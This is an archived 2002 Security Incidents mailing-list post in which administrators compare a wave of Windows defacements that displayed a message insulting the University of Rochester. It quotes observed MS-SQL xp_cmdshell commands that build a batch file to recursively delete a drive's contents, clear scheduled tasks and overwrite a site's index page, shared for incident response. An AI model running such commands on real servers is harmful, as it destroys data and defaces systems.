Security Incidents mailing list archives

RE: Windows Systems Defaced

From: "Johannes B. Ullrich" <jullrich () sans org>
Date: Fri, 3 May 2002 14:43:56 -0400 (EDT)

-----Original Message-----
From: Steve Zenone [mailto:zenone () cats ucsc edu]
Sent: Thursday, May 02, 2002 10:24 PM
To: incidents () securityfocus com
Cc: thompson () isc upenn edu
Subject: RE: Windows Systems Defaced

Hello,

Stephen W. Thompson wrote:
|> Have any of you seen similar activity? Any thoughts?
|
|Yes, we had one that matches most of your details.  These
|are exact matches:
|
|>  [] Damage occurred around 1600 on 5/1/2002
|BUT=>   (approx. 16:00 EDT for us)
|>  [] Win-popup message with "F---ing University of Rochester"
|>       -- NOTE: not all systems running IIS
|>  [] Admins claimed that all systems were patched correctly
|>  [] Most were running updated and current AV

Thank you very much for your reply - it definitely helps!

We have been seeing MS-SQL (1433/tcp) attacks that try and execute
the following:

-----BEGIN SNIPPET-----
    xp_cmdshell 'echo net send localhost F---ing University of Rochester

rebooting... > rochester.bat'

    xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'

    xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'

    xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'

    xp_cmdshell 'at /delete /y'

    xp_cmdshell 'echo if exist \inetpub\wwwroot\ type
%systemroot%\rochester.html ^ e:\inetpub\wwwroot\index.html >>
rochester.bat'
-----END SNIPPET-----

- --
- -------